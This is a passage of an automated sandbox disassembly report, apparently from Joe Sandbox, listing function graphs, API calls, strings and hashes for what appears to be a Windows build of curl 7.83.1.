                                    control_flow_graph 213 e0dc15-e0dc3d 214 e0dcb0-e0dcb3 213->214 215 e0dc3f-e0dc55 call e0375a 213->215 217 e0dcb5-e0dcbb 214->217 218 e0dcc6-e0dcd2 fopen 214->218 224 e0dc81-e0dc8f call e0db81 215->224 225 e0dc57-e0dc69 fopen 215->225 217->218 221 e0dcbd-e0dcc4 __acrt_iob_func 217->221 219 e0dcd3-e0dcdd 218->219 222 e0dce3-e0dcf2 219->222 223 e0e076 219->223 221->219 226 e0dcf5-e0dd06 call e0e08f 222->226 229 e0e078 223->229 236 e0dc91-e0dca2 call e0db81 224->236 237 e0dca8-e0dcae 224->237 227 e0dc7a-e0dc7f 225->227 228 e0dc6b-e0dc75 free 225->228 238 e0dd0c-e0dd1e 226->238 239 e0e04e-e0e061 call e10c88 __acrt_iob_func 226->239 227->222 232 e0e089-e0e08e 228->232 233 e0e07f-e0e086 free 229->233 233->232 236->223 236->237 237->222 242 e0dd24-e0dd28 238->242 243 e0e047 238->243 248 e0e063-e0e06a fclose 239->248 249 e0e06b-e0e072 239->249 246 e0dd53-e0dd57 242->246 247 e0dd2a-e0dd3b call e10a91 242->247 243->239 251 e0dd59 246->251 252 e0dd5c-e0dd63 246->252 255 e0dd65-e0dd6d 247->255 256 e0dd3d-e0dd4b 247->256 248->249 249->233 253 e0e074 249->253 251->252 252->226 253->229 257 e0dd4d 255->257 258 e0dd6f-e0dd75 255->258 256->247 256->257 260 e0dd50 257->260 258->257 259 e0dd77-e0dd7d 258->259 259->257 261 e0dd7f-e0dd85 259->261 260->246 261->257 262 e0dd87-e0dd8f 261->262 262->260 263 e0dd91-e0dd99 262->263 264 e0dd9c-e0dda8 call e10a91 263->264 267 e0ddc2-e0ddc4 264->267 268 e0ddaa-e0ddad 264->268 271 e0de02-e0de05 267->271 272 e0ddc6-e0ddce 267->272 269 e0ddb9-e0ddc0 268->269 270 e0ddaf-e0ddb2 268->270 269->264 269->267 270->267 275 e0ddb4-e0ddb7 270->275 273 e0de85-e0de89 271->273 274 e0de07-e0de0a 271->274 272->271 276 e0ddd0 272->276 279 e0df0f-e0df13 273->279 280 e0de8f-e0de97 273->280 278 e0de0d-e0de12 274->278 275->267 275->269 277 e0ddd2-e0ddda 276->277 281 e0dde8-e0dded 277->281 282 e0dddc-e0dde6 277->282 278->278 283 e0de14-e0de25 malloc 278->283 284 e0df16-e0df3c call e052d9 279->284 285 e0dea5-e0deaa 280->285 286 e0de99-e0dea3 280->286 281->271 288 e0ddef-e0ddf2 281->288 282->281 287 e0ddf9-e0de00 282->287 283->243 289 e0de2b-e0de2f 283->289 296 e0df5c-e0df5f 284->296 297 e0df3e-e0df40 284->297 285->280 291 e0deac-e0deae 285->291 286->285 286->291 287->271 287->277 288->287 293 e0ddf4-e0ddf7 288->293 294 e0de31-e0de33 289->294 291->279 292 e0deb0-e0deb8 291->292 292->279 298 e0deba 292->298 293->271 293->287 299 e0de79-e0de7b 294->299 303 e0df61-e0df69 296->303 304 e0dfd2-e0dfd5 296->304 300 e0e025-e0e029 297->300 301 e0df46-e0df48 297->301 302 e0debc-e0dec7 298->302 305 e0de35-e0de37 299->305 306 e0de7d-e0de80 299->306 311 e0e033-e0e037 300->311 312 e0e02b-e0e032 free 300->312 301->300 307 e0df4e-e0df51 301->307 308 e0dee0-e0dee2 302->308 309 e0dec9-e0ded5 302->309 303->300 310 e0df6f-e0df73 303->310 313 e0dfd8-e0dfde 304->313 305->306 314 e0de39-e0de3e 305->314 306->284 307->300 315 e0df57-e0df5a 307->315 308->279 317 e0dee4-e0dee6 308->317 309->308 316 e0ded7-e0dede 309->316 310->300 318 e0df79-e0df90 malloc 310->318 319 e0e039-e0e03c 311->319 320 e0e03f-e0e042 311->320 312->311 321 e0dfe0-e0dfe6 313->321 322 e0dfed-e0dff3 313->322 323 e0de40-e0de48 314->323 324 e0de74-e0de77 314->324 315->313 316->302 316->308 317->279 326 e0dee8-e0deea 317->326 327 e0df92-e0dfc8 call e023fd 318->327 328 e0dfca-e0dfd0 318->328 319->320 320->252 321->322 329 e0dfe8 321->329 322->300 325 e0dff5-e0dff8 322->325 323->299 330 e0de4a-e0de4d 323->330 324->299 325->300 333 e0dffa-e0dffd 325->333 326->279 334 e0deec-e0deee 326->334 327->300 328->313 329->322 331 e0de6c 330->331 332 e0de4f-e0de52 330->332 339 e0de6e-e0de72 331->339 336 e0de54-e0de58 332->336 337 e0de68-e0de6a 332->337 333->300 338 e0dfff-e0e002 333->338 334->279 340 e0def0-e0df0c call e0913e 334->340 342 e0de64-e0de66 336->342 343 e0de5a-e0de5e 336->343 337->339 338->300 344 e0e004-e0e022 call e08bfc call e0913e 338->344 339->294 340->279 342->339 343->339 346 e0de60-e0de62 343->346 344->300 346->339
                                    APIs
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00E57A20,?,00000000,00000000), ref: 00E0DC5D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00E0CE9B,?,00E0901E,?), ref: 00E0DC6C
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000), ref: 00E0DCBE
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0DE1A
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000310), ref: 00E0DF7E
                                    Strings
                                    • %s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!, xrefs: 00E0DEFC
                                    • _curlrc, xrefs: 00E0DC94
                                    • <stdin>, xrefs: 00E0DFE8
                                    • .curlrc, xrefs: 00E0DC41
                                    • %s:%d: warning: '%s' %s, xrefs: 00E0E012
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: malloc$__acrt_iob_funcfopenfree
                                    • String ID: %s:%d: warning: '%s' %s$%s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!$.curlrc$<stdin>$_curlrc
                                    • API String ID: 2899880627-1529230327
                                    • Opcode ID: a9a3941a799069f76ab97981bf56d12aca894c505b339b3911c71b653497ffea
                                    • Instruction ID: 10426606c8d01c5da396f37f9b6e00867730a6d5923c791a1c89a64366f02525
                                    • Opcode Fuzzy Hash: a9a3941a799069f76ab97981bf56d12aca894c505b339b3911c71b653497ffea
                                    • Instruction Fuzzy Hash: 08E1DD71E082569FDB258FE8C8947FDBBF1AF15308F1864AAD482BB2C1C6754C86CB50
                                    Function 00E0A06F Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 144fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 385 e0a06f-e0a085 fopen 386 e0a0a7-e0a0b3 call e0d323 385->386 387 e0a087-e0a08d 385->387 393 e0a0b5-e0a0b8 386->393 394 e0a0db-e0a0e6 call e120e6 386->394 387->386 388 e0a08f-e0a0a5 call e09199 387->388 396 e0a034-e0a038 388->396 393->394 397 e0a0ba-e0a0d9 call e120e6 free 393->397 402 e0a0e9-e0a0eb 394->402 400 e0c5a8-e0c5b1 396->400 397->402 403 e0c5b3-e0c5b5 400->403 404 e0c5b7-e0c5c1 call e09b4c 400->404 405 e0a103-e0a120 call e0d8d0 free 402->405 406 e0a0ed-e0a0ef 402->406 403->404 407 e0c5c4-e0c5d2 call e50ca6 403->407 404->407 418 e0a122-e0a129 fclose 405->418 419 e0a12a-e0a12e 405->419 409 e0a0f1-e0a0f8 fclose 406->409 410 e0a0f9-e0a0fe call e09199 406->410 409->410 421 e0a032 410->421 418->419 419->421 422 e0a134-e0a142 419->422 421->396 423 e0a144-e0a147 422->423 424 e0a1bc call e12235 422->424 425 e0a149-e0a14f 423->425 426 e0a15a-e0a170 fopen 423->426 431 e0a1c1-e0c596 call e091ba call e216ca 424->431 425->426 428 e0a151-e0a158 call e01018 425->428 429 e0a172-e0a1a2 call e0913e free call e0fea5 426->429 430 e0a1a7-e0a1b6 426->430 428->424 429->407 430->424 431->400 445 e0c598-e0c5a5 fclose 431->445 445->400
                                    APIs
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E57A20), ref: 00E0A079
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,If-None-Match: %s,00000000), ref: 00E0A0CD
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E0A0F2
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0A117
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E0A123
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E0C59E
                                    Strings
                                    • If-None-Match: "", xrefs: 00E0A0DB
                                    • Failed creating file for saving etags: "%s". Skip this transfer, xrefs: 00E0A173
                                    • Failed to allocate memory for custom etag header, xrefs: 00E0A0F9
                                    • k%, xrefs: 00E0A038
                                    • If-None-Match: %s, xrefs: 00E0A0BD
                                    • Failed to open %s, xrefs: 00E0A095
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: fclose$free$fopen
                                    • String ID: Failed creating file for saving etags: "%s". Skip this transfer$Failed to allocate memory for custom etag header$Failed to open %s$If-None-Match: ""$If-None-Match: %s$k%
                                    • API String ID: 502121373-281841017
                                    • Opcode ID: 6a3af1f5f7b3c3f87a69678d85ab93b47e9f56c6bdd349e75c8961204d833ae5
                                    • Instruction ID: c876ce3dbdbb8b2a82b80e8ff3f458c4b2e330205f443d8b534d37d9db72f6fd
                                    • Opcode Fuzzy Hash: 6a3af1f5f7b3c3f87a69678d85ab93b47e9f56c6bdd349e75c8961204d833ae5
                                    • Instruction Fuzzy Hash: 1051DF75A053088FCF249FA0EC55BED77B0AF05305F286179E809BA2D6EB7499C5CB12
                                    Function 00E0CBAE Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 111COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 722 e0cbae-e0cbc7 723 e0ccd0-e0ccdd call e09c50 722->723 724 e0cbcd-e0cbd3 722->724 727 e0cce2-e0cce5 723->727 724->723 726 e0cbd9-e0cbfa call e12235 call e12362 724->726 732 e0ccfd-e0cd01 726->732 734 e0cc00-e0cc06 726->734 729 e0cce7-e0cce9 727->729 729->732 735 e0ccba-e0ccc2 734->735 736 e0cc0c-e0cc1a call e12677 734->736 737 e0ccc4-e0ccc7 call e216ca 735->737 738 e0cccc-e0ccce 735->738 742 e0cc4c-e0cc5a call e12677 736->742 743 e0cc1c-e0cc2b _strdup 736->743 737->738 738->723 738->729 752 e0cc93-e0cca1 call e12677 742->752 753 e0cc5c-e0cc6b _strdup 742->753 744 e0cc8b-e0cc91 call e12920 743->744 745 e0cc2d-e0cc3e call e12920 call e09199 743->745 756 e0ccb6-e0ccb9 744->756 760 e0cc43-e0ccfc 745->760 752->743 764 e0cca7-e0ccb4 call e0305c 752->764 754 e0cc87 753->754 755 e0cc6d-e0cc85 call e12920 call e09159 753->755 754->744 755->760 756->735 760->732 764->756
                                    APIs
                                      • Part of subcall function 00E12677: realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E27EE5,?,?,?,00E28727,?,?,00000000,?,?,?,00E28849,00000000,?,?), ref: 00E126C4
                                      • Part of subcall function 00E12677: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E28849,00000000,?,?,?,00E12373,?,?,?,?,00E016C6,?,00200030), ref: 00E126DF
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E0CC1D
                                      • Part of subcall function 00E12920: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E09117,?,?,?,00000000,Failed to create/open output), ref: 00E12935
                                      • Part of subcall function 00E12677: GetEnvironmentVariableA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00000000,00000001,?,?,?,00E28727,?,?,00000000,?,?,?,00E28849,00000000,?), ref: 00E12698
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E0CC5D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strdupfree$EnvironmentVariablerealloc
                                    • String ID: CURL_CA_BUNDLE$SSL_CERT_DIR$SSL_CERT_FILE$out of memory
                                    • API String ID: 8184070-1311070097
                                    • Opcode ID: 2edc56a22a84035eba9ed07277d82b37c0e4b0cda0035fdee915b037d7f48ec0
                                    • Instruction ID: 93ebe2638a24efc5ce4b86318ba202689a9d0e812ff3edee74f21bf041b5b9de
                                    • Opcode Fuzzy Hash: 2edc56a22a84035eba9ed07277d82b37c0e4b0cda0035fdee915b037d7f48ec0
                                    • Instruction Fuzzy Hash: 90315E30A042529FDB06ABB4DC915DEF7E0AF55314F252269E944B7392DB348EC0C781
                                    Function 00E0CE40 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91stringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 769 e0ce40-e0ce67 _strdup setlocale 771 e0ce92-e0ce96 call e0dc15 769->771 772 e0ce69-e0ce6b 769->772 779 e0ce9b-e0ce9f 771->779 773 e0ce6d-e0ce80 strncmp 772->773 774 e0cece-e0cee4 call e08599 772->774 777 e0ce82-e0ce90 call e1251e 773->777 778 e0cebf-e0cec6 free 773->778 790 e0cef5-e0cef8 774->790 791 e0cee6-e0cee9 call e089a1 774->791 777->771 777->778 784 e0cec7-e0cec9 778->784 782 e0cea1-e0ceaa 779->782 783 e0cebb-e0cebd 779->783 782->783 789 e0ceac-e0ceba call e09159 782->789 783->778 783->784 785 e0cecb 784->785 786 e0ceee-e0cef4 784->786 785->774 789->783 790->786 794 e0cefa-e0cefd 790->794 791->786 796 e0cf06-e0cf09 794->796 797 e0ceff-e0cf04 call e08a54 794->797 799 e0cf12-e0cf15 796->799 800 e0cf0b-e0cf10 call e08b82 796->800 797->786 801 e0cf17-e0cf1a 799->801 802 e0cf1c-e0cf28 799->802 800->786 801->786 802->786
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E0CE46
                                    • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000,00E574AB,?,00000000,?,?,?,00E0901E,?), ref: 00E0CE59
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00E60780,00000002), ref: 00E0CE75
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E0CEC0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strdupfreesetlocalestrncmp
                                    • String ID: --disable$z
                                    • API String ID: 792593065-3267513583
                                    • Opcode ID: f6f98638c5e173c2c5c9e37e16635d1c29b6e03b1563cddd2c5f2623c7635df1
                                    • Instruction ID: cae85c0636a1a14859926e9c3336d3b1185bda535c497aef5d25740273fa6728
                                    • Opcode Fuzzy Hash: f6f98638c5e173c2c5c9e37e16635d1c29b6e03b1563cddd2c5f2623c7635df1
                                    • Instruction Fuzzy Hash: 78210A363003119BCB34A754DD966BE23919B40765F307527FA06F61D1CF60DCC29681
                                    Function 00E08F92 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 61COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • _mbscmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,--dump-module-paths), ref: 00E08F9A
                                    • QueryPerformanceFrequency.API-MS-WIN-CORE-PROFILE-L1-1-0(00E6FAF8), ref: 00E08FF7
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E0902C
                                      • Part of subcall function 00E0310D: CreateToolhelp32Snapshot.API-MS-WIN-CORE-TOOLHELP-L1-1-0(00000008,00000000), ref: 00E03148
                                      • Part of subcall function 00E0310D: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E03155
                                      • Part of subcall function 00E0310D: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00E0316F
                                      • Part of subcall function 00E120F5: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,?,?,00E08A7A,curl 7.83.1 (Windows) %s,00000000), ref: 00E12101
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: CloseCreateErrorFrequencyHandleLastPerformanceQuerySnapshotToolhelp32__acrt_iob_func_mbscmpfflush
                                    • String ID: %s$--dump-module-paths$YR{
                                    • API String ID: 3670006343-1349242960
                                    • Opcode ID: 801c3b4b6ee8775ce9734021d40b6a2dc1cbb6bd82b4983f8c0ef62540d8765a
                                    • Instruction ID: eaa98382b8905a467ebb8eff66894acb4b0c9134382204b6649372792c7e1a26
                                    • Opcode Fuzzy Hash: 801c3b4b6ee8775ce9734021d40b6a2dc1cbb6bd82b4983f8c0ef62540d8765a
                                    • Instruction Fuzzy Hash: 0B0188332087025BCB286B34FC12A6F3B91CF847A0F10261DF8487B2D1EEB08C858781
                                    Function 00E1D282 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 57networklibraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 829 e1d282-e1d2ad WSAStartup 830 e1d325-e1d327 829->830 831 e1d2af-e1d2b4 829->831 832 e1d328-e1d339 call e50ca6 830->832 833 e1d2b6-e1d2bb 831->833 834 e1d31f WSACleanup 831->834 833->834 836 e1d2bd-e1d2c4 call e34e72 833->836 834->830 836->832 840 e1d2c6-e1d2cb call e1d33a 836->840 842 e1d2d0-e1d2d7 840->842 843 e1d2f6-e1d31d call e10b38 QueryPerformanceFrequency 842->843 844 e1d2d9-e1d2f0 GetProcAddress 842->844 843->832 844->843
                                    APIs
                                    • WSAStartup.WS2_32(00000202,B73A4C3C), ref: 00E1D2A5
                                    • WSACleanup.WS2_32 ref: 00E1D31F
                                      • Part of subcall function 00E34E72: GetProcAddress.KERNELBASE(00000000,InitSecurityInterfaceA,?,?,00E1D2C2), ref: 00E34EB0
                                      • Part of subcall function 00E1D33A: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernel32,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D34B
                                      • Part of subcall function 00E1D33A: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,LoadLibraryExA,?,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D363
                                      • Part of subcall function 00E1D33A: _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(security.dll,00E57348,?,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D374
                                      • Part of subcall function 00E1D33A: LoadLibraryExA.KERNELBASE(?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D3B6
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,if_nametoindex), ref: 00E1D2DF
                                    • QueryPerformanceFrequency.API-MS-WIN-CORE-PROFILE-L1-1-0(00E6FAE8), ref: 00E1D315
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: AddressProc$CleanupFrequencyHandleLibraryLoadModulePerformanceQueryStartup_mbspbrk
                                    • String ID: if_nametoindex$iphlpapi.dll
                                    • API String ID: 3026270583-3097795196
                                    • Opcode ID: e67ddb0093fe316207ffe89d9020ef822d4f522fef893cc47b72b0504e2168fb
                                    • Instruction ID: 87d13bf88c2c4c8560c2ce8bf72d1099afdff5fbfd9a0568b27ff07a8bbe3602
                                    • Opcode Fuzzy Hash: e67ddb0093fe316207ffe89d9020ef822d4f522fef893cc47b72b0504e2168fb
                                    • Instruction Fuzzy Hash: 09115571A083008FD724AB35BC1BBAB37D8EB45345F401529E916F60D0EA609C488612
                                    Function 00E036BA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 847 e036ba-e036db 848 e036dc-e036de 847->848 849 e036e0-e036f8 call e120e6 848->849 850 e036fa-e03706 call e120e6 848->850 855 e03709-e0370d 849->855 850->855 856 e03727-e0372a 855->856 857 e0370f-e03712 call e10b16 855->857 859 e03753 856->859 860 e0372c-e03735 856->860 861 e03717-e0371f 857->861 862 e03755-e03759 859->862 860->848 863 e03721-e03726 call e12920 861->863 864 e03737-e03751 _strdup _close call e12920 861->864 863->856 864->862
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E03737
                                    • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E03742
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _close_strdup
                                    • String ID: %s\%c%s$%s\%s$._
                                    • API String ID: 2375632809-4149339551
                                    • Opcode ID: 4f92883bb9f266906e8457966cfa427c5736bc198ae30045eb1858b1279f6a51
                                    • Instruction ID: 7604af6715a331f92050d1af8471dd298b4f0a51ecf236d50391f891331c926c
                                    • Opcode Fuzzy Hash: 4f92883bb9f266906e8457966cfa427c5736bc198ae30045eb1858b1279f6a51
                                    • Instruction Fuzzy Hash: 70113AF79082152ED705ABB89C429FF77BCDB85710F14616EE980B6281E6609A8187A0
                                    Function 00E031FA Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 869 e031fa-e0320a GetStdHandle 870 e03278 869->870 871 e0320c-e0321a GetConsoleMode 869->871 871->870 872 e0321c-e03223 871->872 872->870 873 e03225-e03241 SetConsoleCtrlHandler 872->873 874 e03243-e0325a SetConsoleMode 873->874 875 e03276-e03277 873->875 876 e03269-e03274 SetConsoleCtrlHandler 874->876 877 e0325c-e03267 call e510ee 874->877 875->870 876->875 877->875
                                    APIs
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,00E09002), ref: 00E031FC
                                    • GetConsoleMode.KERNELBASE(00000000,00E6F568), ref: 00E03212
                                    • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(Function_000031E0,00000001,?), ref: 00E03239
                                    • SetConsoleMode.KERNELBASE(00000003), ref: 00E03252
                                    • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(Function_000031E0,00000000), ref: 00E0326C
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Console$CtrlHandlerMode$Handle
                                    • String ID:
                                    • API String ID: 575565773-0
                                    • Opcode ID: 1ea45a38f09f0c9f8807a02385ceba00bdd9fb6fe97ff560b543cd8b48522d1d
                                    • Instruction ID: c009d0f344173eed569f8828e1a2cd636fff01ac45a04ef062aae17d8865ee80
                                    • Opcode Fuzzy Hash: 1ea45a38f09f0c9f8807a02385ceba00bdd9fb6fe97ff560b543cd8b48522d1d
                                    • Instruction Fuzzy Hash: 90016D31249B116EEB119F36BD0AB263A98AF09766B141A34E962F50F0DB60CE858650
                                    Function 00E01E09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93stringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 880 e01e09-e01e30 call e520c0 883 e01e32-e01e3b 880->883 884 e01e3e-e01e4d call e12677 880->884 883->884 887 e01e94-e01e99 884->887 888 e01e4f-e01e64 strtol 884->888 889 e01ed8-e01ee0 887->889 890 e01e9b-e01ea6 GetStdHandle 887->890 891 e01e66-e01e6b 888->891 892 e01e8d-e01e93 call e12920 888->892 896 e01ee2 889->896 897 e01ee5-e01f0c call e50ca6 889->897 894 e01ea8-e01eb5 GetConsoleScreenBufferInfo 890->894 895 e01ec9-e01ecd 890->895 898 e01e6e-e01e73 891->898 892->887 894->895 900 e01eb7-e01ec4 894->900 895->889 901 e01ecf-e01ed6 895->901 896->897 898->898 903 e01e75-e01e7e 898->903 900->895 906 e01ec6 900->906 901->897 903->892 905 e01e80-e01e88 903->905 905->892 907 e01e8a 905->907 906->895 907->892
                                    APIs
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,0000000A,?,?,?,?), ref: 00E01E56
